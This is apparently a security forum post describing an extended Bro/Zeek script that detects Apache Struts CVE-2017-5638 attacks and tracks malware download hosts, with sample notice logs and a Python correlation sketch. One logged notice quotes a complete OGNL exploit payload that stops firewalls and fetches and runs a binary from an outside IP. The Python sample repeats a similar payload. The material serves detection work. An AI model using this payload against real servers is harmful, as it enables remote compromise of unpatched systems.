I extended Scott Campbell's script further and made it more complicated :)
While "HTTP_StrutsAttack" will stop 100% of the recon, there was still a minuscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, the vulnerable system might still do the wget included in the HTTP request and execute the malware, since we aren't blocking the malware download IP in the wget URL, which is almost always a different one than the recon IP.
So the extended script also extracts the malware download IP and generates the following notices:

redef enum Notice::Type += { Attempt, MalwareURL, HostileDomainLookup, MalwareURLClick, FileDownload, Compromise, };

- So now this script extracts the "wget" URL from the Attempt, and then, if the URL has a domain (or a CNAMEd domain), the script further tracks down the IP addresses of the malware host and watches for activity.
- If the wget URL is seen in HTTP, we'd generate a MalwareURLClick notice.
- Further notices for FileDownload and Compromise.
- This script is also clusterized.
I ran it over 24 hours and things look stable with respect to the script. I am still sure there might be some lame detection holes, so feel free to modify it and let me know too.
Surprisingly, unlike previous times, I don't see a huge volume of Struts scanners. I am seeing in the range of ~20s a day instead of ~1,000s a day.
Here are example notices:
1489228734.171565 CbVq832QovIwAQddf2 1.24.191.108 65000 131.243.X.Y 80 - - - tcp Struts::Attempt CVE-2017-5638/Struts attack from 1.24.191.108 seen: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} - 1.24.191.108 131.243.X.Y 80 - worker-5 Notice::ACTION_LOG 3600.000000 F - -- - -
1489237401.399275 C90k4o1Zrn8D7vaXoe 124.117.244.34 49728 128.3.Y.Z 80 - - - tcp Struts::MalwareURL Struts Hostile URLs seen in recon attempt 124.117.244.34 to 128.3.Y.Z with URL [http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;] - 124.117.244.34 128.3.Y.Z 80 - worker-13 Notice::ACTION_LOG 3600.000000 F - - - - -
1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::MalwareURLClick Struts Hostile URL seen 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 60.000000 F - - - - -
1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::Compromise Struts compromise: 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F - - - - -
1489240940.206456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 Frx9jZ1JkcrsVtgOkg application/x-executable http://121.42.249.245:1996/tcp/xhx tcp Struts::FileDownload http://121.42.249.245:1996/tcp/xhx http://121.42.249.245:1996/tcp/xhx 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F
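As an added illustration of the notice chain the post describes (Attempt, MalwareURL, HostileDomainLookup, MalwareURLClick, Compromise, FileDownload), here is a Python sketch of the same correlation logic run over constructed events. This is not the poster's Bro script, which is not included in the post: the `StrutsTracker` class, its event methods, the documentation-range sample addresses, the `dropper.example` domain and the rule that Compromise is only raised when the clicking host was itself the target of an earlier Attempt are all assumptions made for this example.

```python
"""Added example: Python sketch of the Struts notice chain described in the post.
Not the poster's Bro script; names, sample events and the Compromise rule are
assumptions made for illustration only."""
import ipaddress
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# CVE-2017-5638 payloads arrive as an OGNL expression in the multipart
# Content-Type header, starting with "%{(#"; that marker is what raises Attempt.
OGNL_MARKER = re.compile(r"%\{\s*\(#")
# URLs inside the payload (the "wget ..." targets). Stop at whitespace, quotes
# or ';' so the shell commands that follow the URL are not swept into it.
URL_RE = re.compile(r"https?://[^\s'\";]+")
EXECUTABLE_MIMES = {"application/x-executable", "application/x-dosexec", "application/x-elf"}


def _is_ip(host):
    """True for an IPv4/IPv6 literal, False for a domain name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def extract_malware_urls(content_type):
    """Return the download URLs embedded in a Struts OGNL payload, or [] if it is benign."""
    if not OGNL_MARKER.search(content_type or ""):
        return []
    return URL_RE.findall(content_type)


@dataclass
class StrutsTracker:
    """Keeps the per-host state needed to chain the notices together."""
    hostile_domains: set = field(default_factory=set)   # domains taken from payload URLs
    hostile_ips: set = field(default_factory=set)       # IP literals plus resolved domains
    attacked_hosts: set = field(default_factory=set)    # internal hosts that received an Attempt
    notices: list = field(default_factory=list)         # (kind, orig, resp, msg) tuples

    def _notice(self, kind, orig, resp, msg):
        n = (kind, orig, resp, msg)
        self.notices.append(n)
        return n

    def on_http_request(self, orig, resp, content_type):
        """Inbound request: raise Attempt and one MalwareURL per embedded URL."""
        urls = extract_malware_urls(content_type)
        if not urls and not OGNL_MARKER.search(content_type or ""):
            return []
        self.attacked_hosts.add(resp)
        raised = [self._notice("Attempt", orig, resp, "CVE-2017-5638/Struts attack")]
        for url in urls:
            host = urlparse(url).hostname
            if host is None:
                continue
            (self.hostile_ips if _is_ip(host) else self.hostile_domains).add(host.lower())
            raised.append(self._notice("MalwareURL", orig, resp, url))
        return raised

    def on_dns_answer(self, orig, qname, answers):
        """DNS reply for a tracked domain: learn its IPs and raise HostileDomainLookup."""
        qname = qname.lower().rstrip(".")
        if qname not in self.hostile_domains:
            return []
        self.hostile_ips.update(answers)
        return [self._notice("HostileDomainLookup", orig, qname, ",".join(answers))]

    def on_outbound_http(self, orig, dest_ip, url):
        """Internal host contacting a tracked malware host: MalwareURLClick, plus
        Compromise if that host was itself an earlier Attempt target (assumed rule)."""
        if dest_ip not in self.hostile_ips:
            return []
        raised = [self._notice("MalwareURLClick", orig, dest_ip, url)]
        if orig in self.attacked_hosts:
            raised.append(self._notice("Compromise", orig, dest_ip, url))
        return raised

    def on_file(self, orig, dest_ip, url, mime_type):
        """Executable fetched from a tracked host: FileDownload."""
        if dest_ip in self.hostile_ips and mime_type in EXECUTABLE_MIMES:
            return [self._notice("FileDownload", orig, dest_ip, f"{mime_type} {url}")]
        return []


# Constructed sample payload (TEST-NET addresses, reserved .example domain).
SAMPLE_PAYLOAD = (
    "%{(#nike='multipart/form-data')"
    ".(#cmd='wget -c http://192.0.2.10:1996/xhx;chmod 777 xhx;./xhx;"
    "wget http://dropper.example/payload')"
    ".(#p=new java.lang.ProcessBuilder(#cmds))}"
)


def run_demo():
    """Replay a constructed event sequence and return the notice kinds in order."""
    t = StrutsTracker()
    events = [
        t.on_http_request("198.51.100.7", "10.0.0.5", SAMPLE_PAYLOAD),
        t.on_http_request("198.51.100.7", "10.0.0.5", "multipart/form-data; boundary=abc"),
        t.on_dns_answer("10.0.0.5", "dropper.example", ["203.0.113.9"]),
        t.on_outbound_http("10.0.0.5", "192.0.2.10", "http://192.0.2.10:1996/tcp/xhx"),
        t.on_outbound_http("10.0.0.8", "203.0.113.9", "http://dropper.example/payload"),
        t.on_file("10.0.0.5", "192.0.2.10", "http://192.0.2.10:1996/tcp/xhx", "application/x-executable"),
    ]
    return [n[0] for batch in events for n in batch]


if __name__ == "__main__":
    for kind in run_demo():
        print(kind)
```

The URL regex deliberately stops at `;`, so the extracted URL is `http://192.0.2.10:1996/xhx` rather than the whole `xhx;chmod 777 xhx;./xhx;` tail that appears in the post's MalwareURL notice; the click notice still fires on the host, not the path, which matches the post's example where `/xhx` was advertised but `/tcp/xhx` was fetched.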